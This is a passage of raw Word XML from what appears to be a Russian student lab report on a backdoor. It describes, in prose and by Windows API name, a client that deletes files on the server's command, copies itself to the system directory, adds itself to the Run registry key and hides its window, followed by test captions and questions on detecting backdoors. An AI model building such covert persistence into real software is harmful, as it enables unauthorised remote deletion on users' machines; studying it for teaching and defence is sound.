        <w:t xml:space="preserve">Третий параметр-параметр протокола, который зависит от семейства адресов и указанного типа сокета. В данном случае этот параметр равен нулю. Данная функция возвращает дескриптор с номером сокета, под которым он зарегистрирован в операционной системе. В случае ошибки возвращает значение </w:t>
      </w:r>
      <w:r w:rsidR="00D916DC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INVALID</w:t>
      </w:r>
      <w:r w:rsidR="00D916DC" w:rsidRPr="00822A02">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00D916DC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOCKET</w:t>
      </w:r>
      <w:r w:rsidR="00D916DC" w:rsidRPr="00822A02">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F64E8" w14:textId="537F890D" w:rsidR="00D916DC" w:rsidRDefault="00D916DC" w:rsidP="007E2F92">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Далее создается структура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOCKADDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D916DC">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, которая задает транспортный адрес и порт для семейства адресов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AF</w:t>
      </w:r>
      <w:r w:rsidRPr="00D916DC">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INET</w:t>
      </w:r>
      <w:r w:rsidRPr="00D916DC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Задается порт, через который идет подключение. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ф</w:t>
      </w:r>
      <w:r w:rsidRPr="00740819">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ункци</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">я </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:r w:rsidRPr="00740819">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> используется сервером для присваивания сокету имени.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D916D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Функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>listen</w:t>
      </w:r>
      <w:r w:rsidRPr="00D916D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используется для того, чтобы перевести созданны</w:t>
      </w:r>
      <w:r w:rsidR="00B95B14">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> сокет в состояние, в котором он ожидает входящего соединения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26139750" w14:textId="762BCE53" w:rsidR="00227300" w:rsidRDefault="00227300" w:rsidP="007E2F92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создаются аналогичные данные о клиенте. Функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accept</w:t>
      </w:r>
      <w:r w:rsidRPr="0022730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используется сервером для принятия связи на сокет. </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D08">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Если сервер устанавливает связь с клиентом, то функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A2D08">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A2D08">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает новый сокет-дескриптор, через который и происходит общение клиента с сервером.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099738A5" w14:textId="2E06EA69" w:rsidR="00227300" w:rsidRPr="00227300" w:rsidRDefault="00227300" w:rsidP="000E5422">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В случае, когда сервер соединился с клиентом успешно, сервер запрашивает имя файла, которое передается клиенту благодаря функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidRPr="00227300">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Сервер «ждет ответа» от клиента</w:t>
      </w:r>
      <w:r w:rsidR="000E5422">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E5422">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="007716F8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="000E5422">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">При успешном удалении файла на входную строку сервер получит сообщение </w:t>
      </w:r>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t xml:space="preserve">«The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t>deletion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t>successful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="000E5422">
        <w:t xml:space="preserve">. В ином случае </w:t>
      </w:r>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t>– «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t>Deletion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t>Error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E5422" w:rsidRPr="000E5422">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="000E5422">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007716F8" w:rsidRPr="007716F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007716F8">
        <w:t xml:space="preserve">Функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007716F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>closesocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007716F8" w:rsidRPr="007716F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007716F8">
        <w:t>закрывается существующий сокет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA0D60E" w14:textId="1763D1DA" w:rsidR="004B1FAA" w:rsidRDefault="009909FF" w:rsidP="009909FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Клиент</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F783AB" w14:textId="00518FEC" w:rsidR="007E2F92" w:rsidRPr="007716F8" w:rsidRDefault="000E5422" w:rsidP="007E2F92">
      <w:r>
        <w:t xml:space="preserve">В клиенте аналогично серверу создается сокет. </w:t>
      </w:r>
      <w:r w:rsidR="00667E0D">
        <w:t>На этапе создания</w:t>
      </w:r>
      <w:r w:rsidR="0074289A">
        <w:t xml:space="preserve"> сокет подключается к определенному </w:t>
      </w:r>
      <w:r w:rsidR="0074289A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="0074289A">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00667E0D">
        <w:t>ожидает</w:t>
      </w:r>
      <w:r w:rsidR="0074289A">
        <w:t xml:space="preserve"> соединение с указанным сокетом</w:t>
      </w:r>
      <w:r w:rsidR="00667E0D" w:rsidRPr="00667E0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00667E0D">
        <w:lastRenderedPageBreak/>
        <w:t>сервера</w:t>
      </w:r>
      <w:r w:rsidR="007716F8">
        <w:t xml:space="preserve"> при помощи функции </w:t>
      </w:r>
      <w:r w:rsidR="007716F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidR="007716F8" w:rsidRPr="007716F8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00667E0D" w:rsidRPr="00667E0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00667E0D">
        <w:t>При успешном подключении клиент получает путь к файлу</w:t>
      </w:r>
      <w:r w:rsidR="007716F8">
        <w:t xml:space="preserve"> (функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007716F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC75E2">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="007716F8" w:rsidRPr="007716F8">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="007716F8">
        <w:t xml:space="preserve">и удаляет его с помощью функции </w:t>
      </w:r>
      <w:r w:rsidR="007716F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidR="00CC75E2">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="007716F8" w:rsidRPr="007716F8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007716F8">
        <w:t xml:space="preserve">Если файл был успешно удален, то клиент отправляет серверу сообщение об удалении. Функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007716F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>closesocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC75E2">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="007716F8" w:rsidRPr="00CC75E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007716F8">
        <w:t>закрывается существующий сокет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E521F5E" w14:textId="6B55695D" w:rsidR="00CC75E2" w:rsidRDefault="009909FF" w:rsidP="00CC75E2">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Копирование программы-клиента в системный каталог</w:t>
      </w:r>
      <w:r w:rsidR="00CC75E2" w:rsidRPr="00CC75E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC75E2">
        <w:t>и автоматический запуск программы при старте операционной системы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7345684D" w14:textId="4C86F168" w:rsidR="004A50CC" w:rsidRPr="004A50CC" w:rsidRDefault="00CC75E2" w:rsidP="00CC75E2">
      <w:r>
        <w:t xml:space="preserve">Данные действия осуществляются в функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AutoRun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC75E2">
        <w:t xml:space="preserve">(). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Для начала с помощью функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetModuleFileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC75E2">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>) извлекается путь к исполняемому файлу текущего процесса. Если функция выполнена успешна, возвращаемым значением является длина строки, которая копируется в буфер, символами, не включая завершающий нулевой символ</w:t>
      </w:r>
      <w:r w:rsidR="004A50CC">
        <w:t xml:space="preserve">. Возвращаемое значение записывается в переменную </w:t>
      </w:r>
      <w:r w:rsidR="004A50CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidR="004A50CC" w:rsidRPr="004A50CC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7F7FD" w14:textId="7F7BE436" w:rsidR="00CC75E2" w:rsidRDefault="004A50CC" w:rsidP="00CC75E2">
      <w:r>
        <w:t xml:space="preserve">Функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CopyFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A50CC">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">копирует исполняемый файл в системный каталог. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEEF20A" w14:textId="63F5B57F" w:rsidR="004A50CC" w:rsidRPr="004A50CC" w:rsidRDefault="004A50CC" w:rsidP="00CC75E2">
      <w:r>
        <w:t>Для того, чтобы сделать автоматический запуск программы, данный исполняемый файл нужно поместить в определенный раздел реестра, отвечающий за автозапуск. Для начала с помощью функции</w:t>
      </w:r>
      <w:r w:rsidRPr="004A50CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RegOpenKeyEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A50CC">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t>открывается раздел реестра</w:t>
      </w:r>
      <w:r w:rsidRPr="004A50CC">
        <w:t xml:space="preserve"> (SOFTWARE\Microsoft\Windows\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A50CC">
        <w:t>CurrentVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A50CC">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A50CC">
        <w:t>Run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">). Далее функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RegSetValueEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A50CC">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="004A50CC">
        <w:t xml:space="preserve">адает данные и тип указанного значения в разделе реестра. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r w:rsidR="00DD3761">
        <w:t xml:space="preserve">завершении работы с реестром с помощью функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD3761">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RegCloseKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD3761" w:rsidRPr="00DD3761">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="004A50CC">
        <w:t>акрывает</w:t>
      </w:r>
      <w:r w:rsidR="00DD3761">
        <w:t>ся</w:t>
      </w:r>
      <w:r w:rsidRPr="004A50CC">
        <w:t xml:space="preserve"> дескриптор указанного раздела реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364DAE6" w14:textId="5A5B8600" w:rsidR="009909FF" w:rsidRDefault="009909FF" w:rsidP="009909FF">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Скрытие окна программы-клиента</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5D4AFE" w14:textId="1F04F5C4" w:rsidR="009909FF" w:rsidRDefault="007716F8" w:rsidP="00A002D1">
      <w:r>
        <w:t xml:space="preserve">Скрытие окна клиента осуществляется с помощью функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007716F8">
        <w:t>GetConsoleWindow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007716F8">
        <w:t>().</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Она получает дескриптор окна, используемый консолью, связанной с вызывающий процессом клиен</w:t>
      </w:r>
      <w:r w:rsidR="00A002D1">
        <w:t>та.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ShowWindow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A50CC">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">устанавливает состояние показа определяемого окна. Функция на вход получает два параметра: дескриптор окна и то, как окно должно быть показано. </w:t>
      </w:r>
      <w:r w:rsidR="00A002D1">
        <w:t xml:space="preserve">Дескриптор это окно, используемое консолью, полученное функцией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A002D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetConsoleWindow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A002D1">
        <w:t xml:space="preserve">(). Второй параметр </w:t>
      </w:r>
      <w:r w:rsidR="00A002D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SW</w:t>
      </w:r>
      <w:r w:rsidR="00A002D1" w:rsidRPr="00822A02">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00A002D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HIDE</w:t>
      </w:r>
      <w:r w:rsidR="00A002D1" w:rsidRPr="00822A02">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A002D1">
        <w:t>скрывает данное окно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CDD3DB" w14:textId="77777777" w:rsidR="00241E94" w:rsidRDefault="00241E94" w:rsidP="00A002D1"/>
    <w:p w14:paraId="4EEC93EA" w14:textId="77777777" w:rsidR="00241E94" w:rsidRPr="009909FF" w:rsidRDefault="00241E94" w:rsidP="00A002D1"/>
    <w:p w14:paraId="7F9B5715" w14:textId="14F0CC63" w:rsidR="00F41D65" w:rsidRDefault="00AE1FDE" w:rsidP="00F41D65">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Тестирование и результаты </w:t>
      </w:r>
      <w:r w:rsidR="005F5D88">
        <w:t>работы программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DDAD9B" w14:textId="77777777" w:rsidR="00966538" w:rsidRPr="00966538" w:rsidRDefault="00966538" w:rsidP="00966538"/>
    <w:p w14:paraId="40E29F28" w14:textId="77777777" w:rsidR="00966538" w:rsidRDefault="00DD3761" w:rsidP="00A2294E">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A2294E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="296C92CC" wp14:editId="30DD6CA9">
            <wp:extent cx="6011550" cy="1965960"/>
            <wp:effectExtent l="0" t="0" r="8255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спетчер задач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191" cy="19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863E7" w14:textId="5F15B075" w:rsidR="00DD3761" w:rsidRDefault="00966538" w:rsidP="00966538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Pr="00E81C57">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t>Процессы в диспетчере задач</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB6122" w14:textId="3A01C436" w:rsidR="00C8104B" w:rsidRPr="00C8104B" w:rsidRDefault="00C8104B" w:rsidP="00C8104B">
      <w:r>
        <w:t xml:space="preserve">Если путь до файла </w:t>
      </w:r>
      <w:r w:rsidR="00A86F01">
        <w:t>указан верно</w:t>
      </w:r>
      <w:r>
        <w:t>, то серверу приходит сообщение о успешном удалении файла, иначе об ошибке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4318E7" w14:textId="77777777" w:rsidR="00966538" w:rsidRDefault="00966538" w:rsidP="00A2294E">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A2294E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70DC179B" wp14:editId="79EE53A4">
            <wp:extent cx="5128260" cy="2840129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се функции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9" r="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740" cy="284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9CC9B" w14:textId="1000DE31" w:rsidR="00966538" w:rsidRDefault="00966538" w:rsidP="00966538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</w:t>
      </w:r>
      <w:r w:rsidRPr="0014337F">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t>Меню сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157F7CE" w14:textId="77777777" w:rsidR="00966538" w:rsidRDefault="00966538" w:rsidP="003E376E">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79192FE1" wp14:editId="1E6B4989">
            <wp:extent cx="6300470" cy="1801495"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8255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втозапуск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B947" w14:textId="141902A8" w:rsidR="008746E9" w:rsidRPr="008746E9" w:rsidRDefault="00966538" w:rsidP="00EA4EFD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="003E376E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF20A2">
        <w:t>– Добавление клиента в автозагрузку</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15809F3F" w14:textId="5C86F891" w:rsidR="00F41D65" w:rsidRDefault="00F41D65" w:rsidP="00F41D65">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Контрольные вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FAB907" w14:textId="4A35315C" w:rsidR="00F41D65" w:rsidRDefault="00F41D65" w:rsidP="00F41D65">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Какие угрозы несут потайные ходы?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B36BC3" w14:textId="5F0003E5" w:rsidR="007D5F18" w:rsidRPr="007D5F18" w:rsidRDefault="007D5F18" w:rsidP="007D5F18">
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Потайной ход</w:t>
      </w:r>
      <w:r w:rsidR="00A10DB5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позволяет копировать файлы с пораженного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компьютера и на него, получать удаленный доступ к реестру, выполнять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системные операции (перезагрузку системы, создание новых сетевых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 xml:space="preserve">ресурсов, модификацию паролей и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>тп</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557CD259" w14:textId="72155730" w:rsidR="00F41D65" w:rsidRDefault="00F41D65" w:rsidP="00F41D65">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Как можно обнаружить потайной ход, если он открывает порт только на короткие промежутки времени, которые заранее не известны?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BEB88F" w14:textId="5DC3B739" w:rsidR="007D5F18" w:rsidRPr="00A10DB5" w:rsidRDefault="007D5F18" w:rsidP="007D5F18">
      <w:r w:rsidRPr="007D5F18">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D40805">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы обнаружить потайной ход, можно проверять автозагрузки на наличие подозрительных программ. Нужно следить за активными процессами и регулярно проверять сетевые порты. Также следует установить межсетевой экран, </w:t>
      </w:r>
      <w:r w:rsidR="00A10DB5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>с помощью которого можно проверять это. Такое приложение может быть использовано для запрета неизвестным приложениям подключаться к интернету без ведома пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4352848C" w14:textId="1EA25956" w:rsidR="00F41D65" w:rsidRDefault="00F41D65" w:rsidP="00F41D65">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41D65">
        <w:t>Можно ли использовать потайные ходы для организации распределенной атаки типа «отказ в обслуживании»?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5549F65B" w14:textId="6B151646" w:rsidR="00A10DB5" w:rsidRPr="00A10DB5" w:rsidRDefault="00A10DB5" w:rsidP="00A10DB5">
      <w:r w:rsidRPr="00D40805">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Да, потайные ходы можно использовать для организации распределенной атаки </w:t>
      </w:r>
      <w:r>
